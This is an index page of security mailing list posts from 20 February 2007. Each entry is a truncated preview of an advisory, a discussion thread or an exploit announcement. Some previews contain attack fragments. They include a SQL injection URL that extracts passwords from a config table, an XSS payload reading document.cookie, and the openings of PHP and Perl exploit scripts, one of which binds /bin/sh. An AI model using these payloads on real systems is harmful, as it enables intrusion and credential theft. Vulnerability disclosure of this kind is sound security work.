XLAtunes 0.1 (album) Remote SQL Injection Vulnerability

2007-02-20 Thread Guns
#Critical Status:High #Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844 #Greetz:all my friends #confkey->Password #confvalue->Username #Table:config #http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*

NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit

2007-02-20 Thread gmdarkfig
#!/usr/bin/php File Disclosure # Maybe work on other versions. # Interesting exploit =) # if($argc < 5) { print(" NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit -- PHP conditions: none CMS conditions: disable_switch<

Jboss vulnerability

2007-02-20 Thread dexie
Just fired this off to USCERT, not pretty. Original Message Subject: jboss vulnerability From:[EMAIL PROTECTED] Date:Tue, February 20, 2007 10:54 pm To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> Cc: "[EMAIL PROTECTED]" <[EMA

[ MDKSA-2007:043 ] - Updated clamav packages address multiple issues.

2007-02-20 Thread security
Mandriva Linux Security Advisory MDKSA-2007:043 http://www.mandriva.com/security/

ESupport Multiple HTML Injection Vulnerabilities

2007-02-20 Thread DoZ
ESupport Multiple HTML Injection Vulnerabilities Kayako SupportSuite offers true integrated Multi-Channel solution allowing you to manage your emails, online issues, chats, self service and issues received by phone. The entire system has been designed to improve productivity and provide seamle

Re: Solaris telnet vulnerability - how many on your network?

2007-02-20 Thread Marco Ivaldi
Scott, On Sat, 17 Feb 2007, Cromar Scott wrote: I have to wonder if the "old bug" complaints are coming in reference to one of the following: http://www.securityfocus.com/bid/3064/info http://www.securityfocus.com/bid/5531/info I know that my initial reaction was "haven't I seen this before?"

Re: Jboss vulnerability

2007-02-20 Thread James Davis
[EMAIL PROTECTED] wrote: > Please let me know if you need any further info - I have nfi who to > actually contact as auscert has no vulnerability reporting option and this > is a first for me... Your best starting point might be to visit http://www.r

RE: Solaris telnet vulnerability - how many on your network?

2007-02-20 Thread Michael Wojcik
> From: Nate Eldredge [mailto:[EMAIL PROTECTED] > Sent: Friday, 16 February, 2007 21:42 > > On Sat, 17 Feb 2007, Darren Reed wrote: > > > > > Solaris's /bin/login has never supported the "-f" command line option > > until Solaris 10 (RTFM) so this exploit was just plain not possible. > > That i

Re: XLAtunes 0.1 (album) Remote SQL Injection Vulnerability

2007-02-20 Thread str0ke
This was actually found by Bl0od3r, and was posted on the 17th. Yep you pretty much nop'ed the found by section, nice job. http://www.milw0rm.com/exploits/3327 /str0ke On 19 Feb 2007 19:27:31 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: #Critical Status:High #Found By: 0x90 #Download:h

AdMentor Script Remote SQL injection Exploit

2007-02-20 Thread crazy_king
AdMentor Script Remote SQL injection Exploit === [Script Name: AdMentor admin SQL injection [Coded by : [EMAIL PROTECTED] [Author : [EMAIL PROTECTED] [Contact: [EMAIL PROTECTED] [Dork :

Re: Jboss vulnerability

2007-02-20 Thread Harry Hoffman
Hi, Hopefully this will help some of those with mis-configured jboss security. Although, IMHO, jboss should limit access out of the box :-( This is due to improperly configured admin access to jboss. The console and web mgmt are meant to be locked down but are not done so by default. The follo

phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities

2007-02-20 Thread ilkerkandemir
--- AYYILDIZ.ORG PreSents... Script: phpXmms 1.0 Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz Contact: ilker Kandemir Code: include($tcmdp); --

RE: Solaris telnet vulnerability - how many on your network?

2007-02-20 Thread Nate Eldredge
On Mon, 19 Feb 2007, Michael Wojcik wrote: From: Nate Eldredge [mailto:[EMAIL PROTECTED] Sent: Friday, 16 February, 2007 21:42 On Sat, 17 Feb 2007, Darren Reed wrote: Solaris's /bin/login has never supported the "-f" command line option until Solaris 10 (RTFM) so this exploit was just plai

Rootkit Profiler LX

2007-02-20 Thread Tobias Klein
Hi all, I'd like to announce the availability of a new kernel rootkit detection toolkit for Linux called Rootkit Profiler LX (RKProfiler LX). RKProfiler LX is divided into two parts: a data collection component called "Rootkit Profiler Module" (RKPmod) and a data interpretation component calle

MyCalendar multiple XSS

2007-02-20 Thread sn0oPy . team
* MyCalendar multiple XSS * By : sn0oPy * Risk : medium * site : http://abledesign.com/programs/MyCalendar/ * exploit : XSS on the search menu : http://www.target.ma/calendar/index.php?go=search XSS on the url : http://www.target.ma/calendar/index.php?go=";>alert(document.cookie)

Re: [Full-disclosure] Drive-by Pharming Threat

2007-02-20 Thread Andrew Farmer
On 19 Feb 07, at 09:54, <[EMAIL PROTECTED]> wrote: I am curious as to how one "automatically" logs on? Memorized passwords. Also, if a password is required for a subsidiary resource, the browser will ask the user for it. In IE, at least, a sequence like the one I describe below will pop up

Re: Drive-by Pharming Threat

2007-02-20 Thread Jeremy Saintot
[EMAIL PROTECTED] wrote: I am curious as to how one "automatically" logs on? 1. Internet Explorer disallows username:[EMAIL PROTECTED]://192.168.1.0 2. Opera has a very clear warning that you are logging on 3. Firefox has a very clear warning that you are logging on Are there any other methods

Re: DotClear v1.2.5

2007-02-20 Thread contact
So what? Even with register_globals = On it ends with a PHP error, nothing more. Where's your exploit? There's nothing on your site. I may have missed something and I'd like to thank you to warn us before the rest of the world. -- Olivier Meunier

Metaye Released - ZmbScap

2007-02-20 Thread Contact
Team Metaeye has released new project Zmbscap as: The zombie scapper is an automated perl tool for detecting and stopping distributed denial of service programs. The tool automatically searches and scans the desired target for programs by looking for the ports that are used by the zombie mast

TSRT-07-01: Trend Micro ServerProtect StCommon.dll Stack Overflow Vulnerabilities

2007-02-20 Thread TSRT
TSRT-07-01: Trend Micro ServerProtect StCommon.dll Stack Overflow Vulnerabilities http://www.tippingpoint.com/security/advisories/TSRT-07-01.html February 20, 2007 -- CVE ID: CVE-2007-1070 -- Affected Vendor: Trend Micro -- Affected Products: ServerProtect for Windows 5.58 ServerProt

MediaWiki Cross-site Scripting

2007-02-20 Thread eyal
MediaWiki Cross-site Scripting Vulnerabilities. Date: 18/02/2007 Vendor: MediaWiki Vulnerable versions: MediaWiki 1.9.2 (latest) and below. Description: MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack by exploiting the experimental AJAX features, if enabled (def

Re: Jboss vulnerability

2007-02-20 Thread Javier Antunez
Interesting issue... Trying various URLs for fun in one of our lab's jboss, i found the following: http://yoursitehere:port/web-console/ (opens the web console of Jboss) http://yoursitehere:port/jmx-console/ (opens the jmx console of jboss) Most common values for port are 8

NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit

2007-02-20 Thread gmdarkfig
#!/usr/bin/php URL: http://www.acid-root.new.fr/ Support us: Just click once on our publicity ;) -- Usage: $argv[0] -url -victim [Opts] Options: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?

VMware Workstation multiple denial of service and isolation manipulation vulnerabilities

2007-02-20 Thread [EMAIL PROTECTED]
Suggested severity level: Medium. Type of Risk: Denial of Service, Privilege Elevation, Unauthorized Access. Affected Software: VMware Workstation, version 5.5.3 build 34685 (including installation of "VMware Tools" of the same version, in the guest OS). (Older versions and other products by

Re: Apache Multiple Injection Vulnerabilities

2007-02-20 Thread Amit Klein
[EMAIL PROTECTED] wrote: There's a new advisory at: http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/apache/index.html Summarizing: "1.- HTTP 404 error response almost arbitrary injection (Apache) Impact right now: a) fake virus injection in Apache 404 HTTP responses which can le

ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit

2007-02-20 Thread Guns
#!/usr/bin/perl -w # Local Exploit # # [ Exploitation condition ] # - proftpd must be compiled with --enable-ctrls option # - local user needs permission to connect through unix socket (from proftpd.conf) # # This one works for 2.6 exploitation against gcc 4.x # Payload will bind /bin/sh o

qwik-smtpd format string

2007-02-20 Thread hotturk
Advisory : H0tTurk- Product : qwik-smtpd (latest version). Vendor: http://qwikmail.sourceforge.net/ Bug : format string vulnerability Vendor Status : Released Patch. http://qwikmail.sourceforge.net/smtpd/qwik-smtpd-0.3.patch --

[USN-423-1] MoinMoin vulnerabilities

2007-02-20 Thread Kees Cook
=== Ubuntu Security Notice USN-423-1 February 20, 2007 moin, moin1.3 vulnerabilities CVE-2007-0901, CVE-2007-0902 === A security issue affects the following Ubuntu releases: U

TSRT-07-02: Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities

2007-02-20 Thread TSRT
TSRT-07-02: Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities http://www.tippingpoint.com/security/advisories/TSRT-07-02.html February 20, 2007 -- CVE ID: CVE-2007-1070 -- Affected Vendor: Trend Micro -- Affected Products: ServerProtect for Windows 5.58 ServerProtect

RE: Firefox: about:blank is phisher's best friend

2007-02-20 Thread Michael Wojcik
> From: Michal Zalewski [mailto:[EMAIL PROTECTED] > Sent: Friday, 16 February, 2007 17:51 > To: bugtraq@securityfocus.com > Cc: full-disclosure@lists.grok.org.uk > > Firefox suffers from a design flaw that can be used to confuse casual > users and evoke a false sense of authority when visiting a

Re: Web Server Botnets and Server Farms as Attack Platforms

2007-02-20 Thread Anders Henke
On Feb 12th 2007, Gadi Evron wrote: > Most web servers are being compromised by these attacks as a result of an > insecure web application written in PHP, although attacks for other > scripting languages such as Perl and ASP are also in-the-wild. > > The main reason for this is that many different

Re: [Full-disclosure] Drive-by Pharming Threat

2007-02-20 Thread Martin Johns
On 2/19/07, [EMAIL PROTECTED] < [EMAIL PROTECTED]> wrote: I am curious as to how one "automatically" logs on? There are several potential methods (depending on the victim's browser): 1) Older versions of Flash allow the spoofing of arbitrary http headers [1] thus allowing the creation of attack